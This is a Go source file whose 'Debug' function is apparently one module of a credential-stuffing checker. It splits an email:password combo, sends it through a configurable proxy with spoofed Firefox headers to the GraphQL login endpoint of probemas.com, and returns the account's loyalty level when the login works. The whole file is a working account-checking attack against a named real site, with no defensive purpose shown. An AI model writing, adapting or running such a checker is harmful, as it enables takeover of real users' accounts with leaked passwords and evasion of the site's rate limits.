package shared

import (
	"encoding/json"
	"fmt"
	"io/ioutil"
	"net/http"
	"net/http/cookiejar"
	"strings"
)

func Debug(combo string, proxyType string, pAddress string) (string, error) {

	cookieJar, _ := cookiejar.New(nil)
	headers := map[string]string{
		"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:79.0) Gecko/20100101 Firefox/79.0",
		"Referer": "https://probemas.com",
		"Origin": "https://probemas.com",
	}

	parts := strings.Split(pAddress, ":")
	var trans *http.Transport

	if len(parts) == 4 {
		trans, _ = SetupProxy(parts[0]+":"+parts[1], parts[2]+parts[3], proxyType)
	} else {
		trans, _ = SetupProxy(parts[0]+":"+parts[1], "", proxyType)
	}

	client := &http.Client{Transport: trans, Jar: cookieJar}
/*,CheckRedirect: func(req *http.Request, via []*http.Request) error {
	return http.ErrUseLastResponse
}}*/

	/*req, err := Get("https://probemas.com/", headers)
	if err != nil{
		return fmt.Sprintf("[ERROR] SETUP GET %s", req.URL) , err
	}

	resp, err := client.Do(req)
	if err != nil {
		return fmt.Sprintf("[ERROR] GET %s", req.URL) , err
	}
*/
	acc := strings.Split(combo, ":")
	data :=  fmt.Sprintf("[{\"operationName\":\"TokenCreate\",\"variables\":{\"email\":\"%s\",\"password\":\"%s\"},\"query\":\"fragment UserFragment on User {\\n  id\\n  email\\n  fullName\\n  isStaff\\n  isActive\\n  is2faEnabled\\n  loyaltyDetails {\\n    id\\n    spent {\\n      localized\\n      __typename\\n    }\\n    spentPoints\\n    points\\n    progress\\n    spendToNextLevel {\\n      localized\\n      __typename\\n    }\\n    nextLevel {\\n      name\\n      image(size: \\\"50x50\\\") {\\n        url\\n        __typename\\n      }\\n      __typename\\n    }\\n    currentLevel {\\n      id\\n      name\\n      image(size: \\\"50x50\\\") {\\n        url\\n        __typename\\n      }\\n      pointsPerUsd\\n      benefits {\\n        title\\n        description\\n        __typename\\n      }\\n      __typename\\n    }\\n    __typename\\n  }\\n  __typename\\n}\\n\\nmutation TokenCreate($email: String!, $password: String!, $otp: String) {\\n  tokenCreate(email: $email, password: $password, otp: $otp) {\\n    token\\n    user {\\n      ...UserFragment\\n      __typename\\n    }\\n    errors {\\n      field\\n      message\\n      code\\n      __typename\\n    }\\n    __typename\\n  }\\n}\\n\"}]", acc[0], acc[1])

	headers = map[string]string{
		"Accept": "*/*",
		"Accept-Language": "en-US,en;q=0.5",
		"Content-Type": "application/json",
		"Connection": "keep-alive",
		"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:79.0) Gecko/20100101 Firefox/79.0",
		"Referer": "https://probemas.com",
		"Origin": "https://probemas.com",
	}

	req, err := Post("https://probemas.com/graphql/", data, headers)
	if err != nil {
		return fmt.Sprintf("[ERROR] SETUP POST %s", req.URL) , err
	}

	//cookieJar.SetCookies(req.URL, resp.Cookies())
	resp, err := client.Do(req)
	if err != nil {
		return fmt.Sprintf("[ERROR] POST %s", req.URL) , err
	}

	defer resp.Body.Close()
	html, err := ioutil.ReadAll(resp.Body)
	if err != nil{
		return "[ERROR] Read response body", err
	}

	var capture Response
	json.Unmarshal(html, &capture)
	return fmt.Sprintf("RESPONSE: %s", capture[0].Data.TokenCreate.User.LoyaltyDetails.CurrentLevel.Name), nil
}